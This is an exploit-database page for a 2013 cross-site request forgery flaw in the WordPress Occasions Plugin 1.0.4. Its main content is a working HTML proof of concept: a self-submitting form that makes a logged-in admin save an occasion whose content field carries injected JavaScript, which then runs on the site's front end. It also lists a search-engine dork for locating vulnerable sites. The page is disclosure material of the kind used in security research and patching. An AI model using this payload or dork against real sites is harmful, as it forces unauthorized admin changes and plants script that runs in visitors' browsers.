header-logo
Suggest Exploit
vendor:
Occasions Plugin
by:
m3tamantra
3,1
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Occasions Plugin
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: NO
Related CWE: N/A
CPE: 2.3:a:wordpress:occasions:1.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
2013

WordPress Occasions Plugin 1.0.4 CSRF

You can use the CSRF vulnerability to add/delete Occasions. It is also possible to enter JavaScript in occ_content1 parameter when occ_type1=1. This can be used to execute arbitrary JavaScript in the front-end area (shortcode = [Occasions]). The PoC will add an alert in the front-end area.

Mitigation:

Implementing CSRF protection mechanisms, such as checking for a valid nonce, can help mitigate the risk of CSRF attacks.
Source

Exploit-DB raw data:

<html>
<!--
# Exploit Title: WordPress Occasions Plugin 1.0.4 CSRF
# Google Dork: inurl:"/wp-content/plugins/occasions
# Date: 18.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/occasions/
# Software Link: http://downloads.wordpress.org/plugin/occasions.zip
# Version: 1.0.4
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

You can use the CSRF vulnerability to add/delete Occasions. It is also possible to enter JavaScript in occ_content1 parameter when occ_type1=1 .
Think this is a feature not a bug, anyway because of the CSRF vulnerability this can be used to execute arbitrary JavaScript in the front-end area
(shortcode = [Occasions]).

PoC will add an alert in the front-end area.
Note: check occ_startdate1 and occ_enddate1 and set them appropriate.

-->

<head><title>CSRF Occasions</title></head>
<body>
	<!-- replace 127.0.0.1:9001/wordpress -->
	<form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST">
		<input type="hidden" name="action" value="saveoccasions" />
		<input type="hidden" name="nodes[]" value="1" />
		<input type="hidden" name="occ_title1" value="CSRF Vulnerability" />
		<input type="hidden" name="occ_startdate1" value="18.03." />
		<input type="hidden" name="occ_enddate1" value="28.03." />
		<input type="hidden" name="occ_type1" value="1" />
		<input type="hidden" name="occ_content1" value="<script>alert(1)</script>" />
		<script>document.forms[0].submit();</script>
	</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR